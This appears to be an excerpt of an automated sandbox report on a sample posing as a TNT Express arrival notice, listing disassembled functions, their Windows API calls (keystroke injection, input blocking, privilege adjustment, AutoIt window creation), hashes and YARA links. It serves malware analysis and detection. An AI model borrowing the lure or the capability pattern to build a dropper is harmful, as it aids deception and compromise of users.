Opcode Fuzzy Hash: d891290c4fe8516d6dc3f7f8f9200a6fdf370f1c3a78f1ec9050cdb1e4ee0936
Instruction Fuzzy Hash: 38118E71614200AFC710DF29D484B16BBE5FF85329F14C69DE4698F6A2CB70EC05CB91

Function 009337B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00944891,?,?,00000035,?), ref: 009337E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00944891,?,?,00000035,?), ref: 009337F4

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 56919c7a5ff76b8556948c4fa04b687eebc842fe62e3a5310f42bbf15956fe48
Instruction ID: a1308c8eb6e30c1be4af5fe4f0b6a537f95ffdab93c77b8c6bcaf257ee89c6b6
Opcode Fuzzy Hash: 56919c7a5ff76b8556948c4fa04b687eebc842fe62e3a5310f42bbf15956fe48
Instruction Fuzzy Hash: 64F0E5B06043292EE72017668C4DFEB3AAEEFC4761F000165F609E2291DA709904CBB0

Function 0092B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0092B25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0092B270

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: be1d3c3f4b62f35d1d322ad5b3d3ce2f8af89f87ddf35178c3a3834047609daf
Instruction ID: 439912f53c70fba444e684c123846846dbf27ab877fc58ea66dcc802e8d964c8
Opcode Fuzzy Hash: be1d3c3f4b62f35d1d322ad5b3d3ce2f8af89f87ddf35178c3a3834047609daf
Instruction Fuzzy Hash: 13F01D7181434DAFDB059FA1D805BAE7FB4FF08305F008409F965A5192D3799611DF94

Function 009210BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009211FC), ref: 009210D4
CloseHandle.KERNEL32(?,?,009211FC), ref: 009210E9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 93c362f7047e0242009fd6062f2ba8b74f6ba495dcfbcb1568b3b6e0ab551974
Instruction ID: cddd41b09a608d3ae15241b05a67a24b345ad5294235b206958d6e9f867f8501
Opcode Fuzzy Hash: 93c362f7047e0242009fd6062f2ba8b74f6ba495dcfbcb1568b3b6e0ab551974
Instruction Fuzzy Hash: 63E04F72018710AEEB252B66FC05E7377A9FB04311B10892EF5A6C04B6DB626CA0EB50

Function 008CCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00910C40

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 9e3a2511a3aff481a3fcf08b98a64b509f2c611cee72ef3313236180274e0aa2
Instruction ID: ad7326b6c54c8a80b7d328ce446388a440a93828bc876da1908a153226d4df3f
Opcode Fuzzy Hash: 9e3a2511a3aff481a3fcf08b98a64b509f2c611cee72ef3313236180274e0aa2
Instruction Fuzzy Hash: 88324A74A102189BCF14DF94C885FEDB7B9FF45308F14805DE80AAB291DB76E985CB61

Function 008F676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008F6766,?,?,00000008,?,?,008FFEFE,00000000), ref: 008F6998

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e4071199228cac84a975130289e6eec445086366511928debc1c7ce9143cd9be
Instruction ID: 8ebc42c11428d0245a46cb49ad87dc0ce9398de949a2b8ce7b39af5638c33b40
Opcode Fuzzy Hash: e4071199228cac84a975130289e6eec445086366511928debc1c7ce9143cd9be
Instruction Fuzzy Hash: 15B13B3162060D9FD715CF28C48AB657BE0FF45368F29865CE999CF2A2D335E9A1CB40

Function 008DB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0091851F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: be97429e0bbf3eb7c53cfbe73fad639f2ec16ae21df8f8881a7f4c2ef449dc43
Instruction ID: 8da139ef818a58830702112e1dcc60e5e97aecb1a105c6d392a995132e07e337
Opcode Fuzzy Hash: be97429e0bbf3eb7c53cfbe73fad639f2ec16ae21df8f8881a7f4c2ef449dc43
Instruction Fuzzy Hash: 69124E71A00229DBDB14CF58C881AEEB7F5FF48710F15819AE849EB351DB349E81DB94

Function 0093EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0093EABD

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 5a80a708bb0f71d2976b0b7b806ccdb3307387bc4c296ecb0d85f1152a5df841
Instruction ID: 4fda209c7437bf00d7e2a36ab575ab6a151e4ca019d3e96cd7d4c03c66ae7505
Opcode Fuzzy Hash: 5a80a708bb0f71d2976b0b7b806ccdb3307387bc4c296ecb0d85f1152a5df841
Instruction Fuzzy Hash: 87E01A352102059FC710EF5AD805E9AB7E9FF98760F00841AFC49C7391DAB0E8418B91

Function 008E09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008E03EE), ref: 008E09DA

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 52099cbfbccac420de9f48da21492a1f3dc29afe17f595568f2b229a110a077c
Instruction ID: d1c38aad85b2267fd18903fb73766ad429990a4c970a4b8a7847d52ffba30c43
Opcode Fuzzy Hash: 52099cbfbccac420de9f48da21492a1f3dc29afe17f595568f2b229a110a077c
Instruction Fuzzy Hash:

Function 008E781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 008E798B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: d929befcdc24a59ec1f515b77b54b419b8251ccb2a358f0b1c6ca6a4d97c08d3
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: BA51997160C6E99BEB38956F885D7BE2B89FF23344F180539D886C7283C619DE01D35A

Function 008F6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5741fceb46e0880b6c3db57033be5b89cef858169a9f501f0aeccba777e164c3
Instruction ID: 7a9cd412f8f7158a266559aa272b6039f40b9f845c0b5520f5dd0d90acd25680
Opcode Fuzzy Hash: 5741fceb46e0880b6c3db57033be5b89cef858169a9f501f0aeccba777e164c3
Instruction Fuzzy Hash: A0321122D3DF054DE7239634C822336A649EFB73C5F15D73BE81AB5AA9EB69C4835100

Function 008DCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 276df7f81b559aea1c38cfbd2d92a3eb84b0f462ae15e1e246f3d852c09210ae
Instruction ID: f8cc1c156ef7add008ab375b7db22326f22febd3cf9b6368ca3148f68f109843
Opcode Fuzzy Hash: 276df7f81b559aea1c38cfbd2d92a3eb84b0f462ae15e1e246f3d852c09210ae
Instruction Fuzzy Hash: B532F1B1B8411E8ADF28CA28C5906FD77A5EF45310F288A6BD98ADB391D234DDC1DB41

Function 008C7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cffaa4a4fa40d0853d61179918f973ae9a63157e9e750dd4d9e1c38841be007f
Instruction ID: ba29ccc2eb4c92c4381f717cad74446145f4ed3582f63c35d2c85487785f907f
Opcode Fuzzy Hash: cffaa4a4fa40d0853d61179918f973ae9a63157e9e750dd4d9e1c38841be007f
Instruction Fuzzy Hash: AF228C70A0460A9FDF14CFA8C881AAEB7B6FF44314F104629E816E7291EB36ED54CF51

Function 008C91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108bd01bf4b41b5c9de569a02986c69f3613c1024dafa18d31dacf5a308753bf
Instruction ID: e282e14ee2cc5e7911aed84dbd504e93e236e8a98ba6dde4c7c3a2d64dbab45c
Opcode Fuzzy Hash: 108bd01bf4b41b5c9de569a02986c69f3613c1024dafa18d31dacf5a308753bf
Instruction Fuzzy Hash: 3702B5B1A00219EFDB04DF64D881BADB7B5FF44300F508569E856DB391EB31DA11DB91

Function 008E1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 22a7ba97194ebae161c12d69f13093fc061fc33bb59516deb0f224f59f2cb589
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 7E9144726080E34ADF69463B857847EFFE1EA933A131A079DE4F2CA1C5EE34D954D620

Function 008E19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 5f3a3cb842d09a6cb7a0109b193e9f4a4a2903388f07dd3a24f3890a419ea87d
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 2A9110722090E24ADF69467B857803DFEE1AA933B531A07AED4F2CA1C1FE34C5549620

Function 008E7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 465fd4c140b3416427cb79661e153554aae1c5499aec5b0b76e28a8f25c524e7
Instruction ID: 5faf4d98019b064a986fc1fb1921368d7c567cccaae0a0e52f9d9e14211acd74
Opcode Fuzzy Hash: 465fd4c140b3416427cb79661e153554aae1c5499aec5b0b76e28a8f25c524e7
Instruction Fuzzy Hash: E06169716087D9A6DA349A2F8C95BBE3398FF83764F20092DE942DB2C1D611DE428316

Function 008E7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5bd55f929e253bb11a15a06233f2e7bec10cfe5ac504357180b4f48a9c2bc0c
Instruction ID: 18e9090e5f086cab8f561d2e08cfa524a1edd5c8e7f689a6b6d3936af63977ab
Opcode Fuzzy Hash: c5bd55f929e253bb11a15a06233f2e7bec10cfe5ac504357180b4f48a9c2bc0c
Instruction Fuzzy Hash: C7617B7170C7CEA6DE385A2F4C95BBF2389FF43B44F100959E942DB289EA12DD428356

Function 008E1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 22f8e94de3d83992e1b5afd85c6116c0d404e2546a65b542eb2af6a55a40149d
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 778141726090E34ADF69423B857847EFFE1BA933A131A07ADD4F2CA1C6EE34C554D620

Function 00932046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089b6c5d2680233ae3c5087fe8e3a2da34d685c1a58550f745731fd76acf23fb
Instruction ID: 33902571911a4c518801488556ca91c79002ef8ce5ac862eb3b6ded0530758a1
Opcode Fuzzy Hash: 089b6c5d2680233ae3c5087fe8e3a2da34d685c1a58550f745731fd76acf23fb
Instruction Fuzzy Hash: A621A5326216158BDB2CCF7DC82267E73E9A754310F25862EE4A7C77D0DE35A904DB90

Function 00942ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00942B30
DeleteObject.GDI32(00000000), ref: 00942B43
DestroyWindow.USER32 ref: 00942B52
GetDesktopWindow.USER32 ref: 00942B6D
GetWindowRect.USER32(00000000), ref: 00942B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00942CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00942CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942CF8
GetClientRect.USER32(00000000,?), ref: 00942D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00942D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942DA8
GlobalFree.KERNEL32(00000000), ref: 00942DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0095FC38,00000000), ref: 00942DDB
GlobalFree.KERNEL32(00000000), ref: 00942DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00942E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00942E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00942E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0094303F

Strings

DISPLAY, xrefs: 00942EA2
AutoIt v3, xrefs: 00942CF2
static, xrefs: 00942D3A, 00942E91
